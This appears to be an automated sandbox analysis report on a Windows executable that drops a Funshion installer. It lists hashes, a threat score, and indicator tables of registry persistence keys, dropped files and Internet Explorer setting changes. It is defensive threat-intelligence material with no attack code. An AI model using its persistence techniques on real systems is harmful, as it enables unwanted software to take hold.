eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708

Analysis

max time kernel
150s
max time network
164s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
27-11-2022 16:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
Size

113KB
MD5

a298dd36332941c8308614816bb0aeb4
SHA1

e9a78fdf42f13b82bdc81e214940054440e6b540
SHA256

eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708
SHA512

4a71bbc35c6e83e08c69189529ce566a24fb96d7aa2022c88c0b65747f5fbadde2a40b24a043fcfee1f5d3492efd1d2861087a2edc13da989de0137a433f63ec
SSDEEP

3072:34eYZ4+1JXJJX31sIOZFe4Cp+JIpNVd/C290bu:I5O87SIkFe4qpNVc5q

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

FunshionInstall_C105806.exe

pid process

2148 FunshionInstall_C105806.exe

Registers COM server for autorun 1 TTPs 53 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDA42200-BD88-11D0-BD4E-00A0C911CE86}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{70E102B0-5556-11CE-97C0-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D3588AB0-0781-11CE-B03A-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{79376820-07D0-11CF-A24D-0020AFD79767}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{48025243-2D39-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB6-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B87BEB7B-8D29-423F-AE4D-6582C10175AC}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51B4ABF3-748F-4E3B-A276-C828330E926A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05589FAF-C356-11CE-BF01-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FEB50740-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E651CC0-B199-11D0-8212-00C04FC32C45}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB8-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3ECBC41-581A-4476-B693-A63340462D8B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB1-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4444AC9E-242E-471B-A3C7-45DCD46352BC}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB7-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{944D4C00-DD52-11CE-BF0E-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E5B4EAA0-B2CA-11CE-8D2B-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{301056D0-6DFF-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB2-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99D54F63-1A69-41AE-AA4D-C976EB3F0713}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{418AFB70-F8B8-11CE-AAC6-0020AF0B99A3}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDBD8D00-C193-11D0-BD4E-00A0C911CE86}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8670C736-F614-427B-8ADA-BBADC587194B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1643E180-90F5-11CE-97D5-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{59CE6880-ACF8-11CF-B56E-0080C7C4B68A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A2-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B80AB0A0-7416-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8DFB9A0-8A20-479F-B538-9387C5EEBA2B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4979309-7A32-495E-8A92-7B014AAD4961}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{07B65360-C445-11CE-AFDE-00AA006C14F4}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D8AA343-6E63-4663-BE90-6B80F66540A3}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2D2E24CB-0CD5-458F-86EA-3E6FA22C8E64}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A5-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37E92A92-D9AA-11D2-BF84-8EF2B1555AED}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{336475D0-942A-11CE-A870-00AA002FEAB5}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06B32AEE-77DA-484B-973B-5D64F47201B0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC785860-B2CA-11CE-8D2B-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe

Loads dropped DLL 13 IoCs

Processes:

eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exeFunshionInstall_C105806.exe

pid	process
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe

Drops file in System32 directory 2 IoCs

Processes:

FunshionInstall_C105806.exe

description	ioc	process
File created	C:\Windows\SysWOW64\funshion.ini	FunshionInstall_C105806.exe
File opened for modification	C:\Windows\SysWOW64\funshion.ini	FunshionInstall_C105806.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 45 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{07BCCB71-6F33-11ED-A6F1-EED7317926BC} = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376415030"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fbec07815684004d899a318f710de6af00000000020000000000106600000001000020000000ba31f9c413f21baf9c2b529e7fa0131462e611817e7fab31ef14b7e172146f7e000000000e80000000020000200000004c691e9c0ed6b07affa946ab085f5c2b4eb8bff98f4a2e86da416f27161658d92000000009ce2b26fdc354128257b5725870b1804dca1206e96617beb71411d8f7ff4171400000000eba15ceeee33118f9dd765e39bf1cd0e2d44235c89b1a9e9660e603c814fdbae587edaf493286b98f7ff8f01645c730407c7b71351fa78ff05ba58b1944c786	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b04639da3f03d901	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fbec07815684004d899a318f710de6af000000000200000000001066000000010000200000001e73dd255673d603486d5325657553315c654b8dc6a5df92f33d70c9bc525439000000000e800000000200002000000071168b3e0a3cafa3fe034b53cc39eb2c83ac7ea8777d2ae651014e1bfcf89b1a90000000b8e64937ea3a8e76567658e50dd83d078aab4eada509c95d48c01ad294dd167eb0c0de4095d581b410a3ec6b01f539720ee8e690cee85d4d7dc52165c1c64d14a2acc4bd16bf8a9bf3812229a4b0b12d8ec160881270ff80f2a5cd656f151940123a42edd16df2e8dc76d195af98dd8f15d6337f712ded715a42eaae084468635508f2b3955a4fd99114f5460472df5c4000000074237b70c4417bebab9c79d8d4cd358f6af7d1109b15cc7e7eaf9e9ea973462273c60589bac3556d7ab280b27091b8ebbdb32987dad9bcc561aa618c7e78c7de	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.EXE

Modifies registry class 64 IoCs

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{79376820-07D0-11CF-A24D-0020AFD79767}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6A08CF80-0E18-11CF-A24D-0020AFD79767}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A5-7548-11CF-A520-0080C77EF58A}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{418AFB70-F8B8-11CE-AAC6-0020AF0B99A3}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A2-7548-11CF-A520-0080C77EF58A}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{301056D0-6DFF-11D2-9EEB-006008039E37}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{301056D0-6DFF-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\CLSID = "{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{51B4ABF3-748F-4E3B-A276-C828330E926A}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\FriendlyName = "MPEG Audio Decoder"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB1-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\FriendlyName = "Multi-file Parser"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{FEB50740-7BEF-11CE-9BD9-0000E202599C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{336475D0-942A-11CE-A870-00AA002FEAB5}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06B32AEE-77DA-484B-973B-5D64F47201B0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99D54F63-1A69-41AE-AA4D-C976EB3F0713}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51B4ABF3-748F-4E3B-A276-C828330E926A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB5-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A2-7548-11CF-A520-0080C77EF58A}\FriendlyName = "MIDI Parser"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{48025243-2D39-11CE-875D-00608CB78066}\CLSID = "{48025243-2D39-11CE-875D-00608CB78066}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB85-524F-11CE-9F53-0020AF0BA770}\0 = "0, 4, , 52494646, 8, 8, , 43445841666D7420, 36, 20, FFFFFFFF00000000FFFFFFFFFFFFFFFFFFFFFFFF, 646174610000000000FFFFFFFFFFFFFFFFFFFF00"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1643E180-90F5-11CE-97D5-00AA0055595A}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB6-524F-11CE-9F53-0020AF0BA770}\FriendlyName = "File Source (URL)"	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\FilterData = 0200000000006000020000000000000030706933000000000000000001000000000000000000000030747933000000006000000070000000317069330800000000000000010000000000000000000000307479330000000060000000700000006175647300001000800000aa00389b7100000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37E92A92-D9AA-11D2-BF84-8EF2B1555AED}\InprocServer32	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{301056D0-6DFF-11D2-9EEB-006008039E37}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33D9A760-90C8-11D0-BD43-00A0C911CE86}\Instance\MJPEG Compressor\CLSID = "{B80AB0A0-7416-11D2-9EEB-006008039E37}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2D2E24CB-0CD5-458F-86EA-3E6FA22C8E64}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B87BEB7B-8D29-423F-AE4D-6582C10175AC}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{48025243-2D39-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB7-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B80AB0A0-7416-11D2-9EEB-006008039E37}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB8-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\CLSID = "{CF49D4E0-1115-11CE-B03A-0020AF0BA770}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\FriendlyName = "ACM Wrapper"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{944D4C00-DD52-11CE-BF0E-00AA0055595A}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8DFB9A0-8A20-479F-B538-9387C5EEBA2B}\InprocServer32	regsvr32.exe
